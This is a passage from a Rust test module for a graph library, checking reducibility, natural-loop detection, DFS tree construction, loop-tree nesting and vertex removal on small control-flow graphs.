fn test_is_reducible_should_return_false_for_irreducible_graph() {
// Loop 2-3 with two loop entries 2 & 3 -> irreducible
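// A graph is reducible when every loop can only be entered through a single header
// vertex that dominates all vertices in the loop; here both 2 and 3 are reachable from
// outside the loop, so no such header exists.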
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((1, 3)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph.insert_edge((3, 2)).unwrap();
graph
};
assert_eq!(graph.is_reducible(1).unwrap(), false);
}
#[test]
fn test_is_reducible_should_return_true_for_reducible_graph() {
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap(); // loop header
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph.insert_edge((2, 4)).unwrap();
graph.insert_edge((3, 1)).unwrap(); // back edge
graph
};
assert!(graph.is_reducible(1).unwrap());
}
#[test]
fn test_compute_loops_single_loop() {
let graph = create_test_graph();
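// compute_loops presumably identifies natural loops via back edges: an edge n -> h where
// h dominates n yields a loop headed by h containing every vertex that reaches n without
// passing through h. The shared graph has exactly one such loop, headed by 2.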
let loops = graph.compute_loops(1).unwrap();
assert_eq!(loops.len(), 1);
assert_eq!(loops[0].header(), 2);
assert_eq!(loops[0].nodes(), &vec![2, 3, 4, 5].into_iter().collect());
}
#[test]
fn test_compute_loops_nested_loops() {
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_vertex(5).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph.insert_edge((3, 4)).unwrap();
graph.insert_edge((3, 2)).unwrap(); // back edge
graph.insert_edge((4, 5)).unwrap();
graph.insert_edge((4, 1)).unwrap(); // back edge
graph
};
let loops = graph.compute_loops(1).unwrap();
assert_eq!(loops.len(), 2);
assert!(loops.contains(&Loop::new(1, vec![1, 2, 3, 4].into_iter().collect())));
assert!(loops.contains(&Loop::new(2, vec![2, 3].into_iter().collect())));
}
#[test]
fn test_compute_loops_disjoint_loops() {
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_vertex(5).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph.insert_edge((2, 1)).unwrap(); // back edge
graph.insert_edge((3, 4)).unwrap();
graph.insert_edge((4, 5)).unwrap();
graph.insert_edge((4, 3)).unwrap(); // back edge
graph
};
let loops = graph.compute_loops(1).unwrap();
assert_eq!(loops.len(), 2);
assert!(loops.contains(&Loop::new(1, vec![1, 2].into_iter().collect())));
assert!(loops.contains(&Loop::new(3, vec![3, 4].into_iter().collect())));
}
#[test]
fn test_compute_loops_self_loop() {
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((2, 3)).unwrap();
graph.insert_edge((2, 2)).unwrap(); // back edge
graph
};
let loops = graph.compute_loops(1).unwrap();
assert_eq!(loops.len(), 1);
assert_eq!(loops[0].header(), 2);
assert_eq!(loops[0].nodes(), &vec![2].into_iter().collect());
}
#[test]
fn test_compute_loops_should_combine_loops_with_same_header() {
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((1, 3)).unwrap();
graph.insert_edge((2, 1)).unwrap(); // back edge
graph.insert_edge((3, 1)).unwrap(); // back edge
graph
};
let loops = graph.compute_loops(1).unwrap();
assert_eq!(loops.len(), 1);
assert_eq!(loops[0].header(), 1);
assert_eq!(loops[0].nodes(), &vec![1, 2, 3].into_iter().collect());
}
#[test]
fn test_compute_dfs_tree() {
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_vertex(5).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((1, 3)).unwrap();
graph.insert_edge((1, 4)).unwrap();
graph.insert_edge((2, 5)).unwrap();
graph.insert_edge((3, 2)).unwrap();
graph
};
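// The expected tree assumes successors are pushed onto the DFS stack in edge-insertion
// order and popped LIFO, so the most recently inserted successor of a vertex is visited
// first (after 1: vertex 4, then 3, then 2, then 5).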
let expected_tree = {
let mut tree = Graph::new();
// visit 1 -> stack [(1,2), (1,3), (1,4)]
tree.insert_vertex(NullVertex::new(1)).unwrap();
// visit 4 -> stack [(1,2), (1,3)]
tree.insert_vertex(NullVertex::new(4)).unwrap();
tree.insert_edge(NullEdge::new(1, 4)).unwrap();
// visit 3 -> stack [(1,2), (3,2)]
tree.insert_vertex(NullVertex::new(3)).unwrap();
tree.insert_edge(NullEdge::new(1, 3)).unwrap();
// visit 2 -> stack [(1,2), (2,5)]
tree.insert_vertex(NullVertex::new(2)).unwrap();
tree.insert_edge(NullEdge::new(3, 2)).unwrap();
// visit 5 -> stack [(1,2)]
tree.insert_vertex(NullVertex::new(5)).unwrap();
tree.insert_edge(NullEdge::new(2, 5)).unwrap();
// skip 2 -> stack []
tree
};
assert_eq!(expected_tree, graph.compute_dfs_tree(1).unwrap());
}
#[test]
fn test_compute_loop_tree() {
let graph = {
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_vertex(4).unwrap();
graph.insert_edge((1, 2)).unwrap();
graph.insert_edge((2, 2)).unwrap(); // self loop
graph.insert_edge((2, 3)).unwrap();
graph.insert_edge((3, 1)).unwrap(); // back edge to 1
graph.insert_edge((3, 4)).unwrap();
graph.insert_edge((4, 4)).unwrap(); // self loop
graph
};
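// The loop tree nests loops by containment: the self loop at 2 lies inside the outer
// loop {1, 2, 3}, giving the single edge 1 -> 2, while the self loop at 4 is not
// contained in any other loop and remains disconnected.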
let expected_loop_tree = {
let mut tree = LoopTree::new();
tree.insert_vertex(Loop::new(1, vec![1, 2, 3].into_iter().collect()))
.unwrap();
tree.insert_vertex(Loop::new(2, vec![2].into_iter().collect()))
.unwrap();
tree.insert_vertex(Loop::new(4, vec![4].into_iter().collect()))
.unwrap();
tree.insert_edge(NullEdge::new(1, 2)).unwrap(); // loop 2 is nested in loop 1
tree
};
let loop_tree = graph.compute_loop_tree(1).unwrap();
assert_eq!(expected_loop_tree, loop_tree);
}
#[test]
fn test_remove_vertex() {
// GIVEN
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_vertex(2).unwrap();
graph.insert_vertex(3).unwrap();
graph.insert_edge((1, 2)).unwrap(); // ingoing
graph.insert_edge((2, 3)).unwrap(); // outgoing
graph.insert_edge((1, 3)).unwrap();
// WHEN
graph.remove_vertex(2).unwrap();
// THEN should have removed vertex 2 and ingoing/outgoing edges
assert_eq!(vec![&1, &3], graph.vertices());
assert_eq!(vec![&(1, 3)], graph.edges());
}
#[test]
fn test_remove_vertex_with_self_loop() {
// GIVEN
let mut graph = Graph::new();
graph.insert_vertex(1).unwrap();
graph.insert_edge((1, 1)).unwrap(); // self loop
// WHEN
graph.remove_vertex(1).unwrap();
// THEN should have removed vertex 1 and self loop
assert!(graph.vertices().is_empty());
assert!(graph.edges().is_empty());
}
}